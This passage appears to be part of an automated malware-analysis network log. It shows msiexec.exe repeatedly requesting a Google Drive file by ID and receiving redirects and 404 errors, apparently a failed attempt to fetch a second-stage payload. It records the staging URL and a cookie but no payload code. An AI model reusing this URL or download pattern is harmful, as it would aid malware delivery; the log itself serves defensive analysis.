                                                                    2025-01-11 02:09:26 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 37 45 69 4c 52 4f 61 55 47 76 7a 46 66 61 41 56 42 69 67 44 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="p7EiLROaUGvzFfaAVBigDw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.650018216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:27 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:27 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:27 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-QoQPa0l7oxOigQetuOm6ZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.650019142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:28 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:28 UTC1851INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgThZMaEJ6nhJpFG9cMRNKZxGdB6FPITtZVXbpkkfHD4Qjqjy4_Rfg7gJTTDAJW9dZiVpWhrgMs
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:28 GMT
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-6KV-VokfnN3gCHt0jhNRrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:09:28 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 45 34 2d 6b 34 49 52 42 61 75 6a 57 45 39 41 64 47 52 36 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0E4-k4IRBaujWE9AdGR6lQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.650020216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:29 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:29 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:29 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: script-src 'nonce-0aoPuYC7gt0qya7JMbB6Wg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.2.650021142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:30 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:30 UTC1851INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgSwCHat4uhEJ4UeKb7te0J71D_tJglQ3l5UHA3u8sHUWQkAMA6ZKrN7SkVrvj9pUPV-bKMn5uw
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:30 GMT
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-BXAuri8N-g8MqamUDEvxiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:09:30 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 66 56 79 53 5f 51 4e 2d 63 76 74 55 79 36 5f 41 47 71 72 70 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pfVyS_QN-cvtUy6_AGqrpQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.2.650022216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:31 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:31 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:31 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-izANSYGxC1ZLLJLNEekxkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.2.650023142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:32 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:33 UTC1851INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgQFFFDL6iJB0uVtmxZWg7YTE7svkqNKozszD9bYoTt0XDEejBki-lV6iUpzAzc4qpvZw7Y9NzI
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:33 GMT
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-0uNW_C1Nd0rfJ8rGXqQaOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:09:33 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 6d 4a 6d 38 76 64 72 6d 44 68 33 52 42 59 48 54 6e 4e 36 52 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NmJm8vdrmDh3RBYHTnN6RA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.2.650024216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:34 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:34 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:34 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-o29F4_8lZla8fOQCBlBMYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    39192.168.2.650025142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:35 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:35 UTC1851INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgScSgnFCF1bib7ImfpRNgOwgBA_lupFaR_qSHRPyDpoh6PHtxIYb7GYuZCIsTYF1oMhS7iwhI0
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
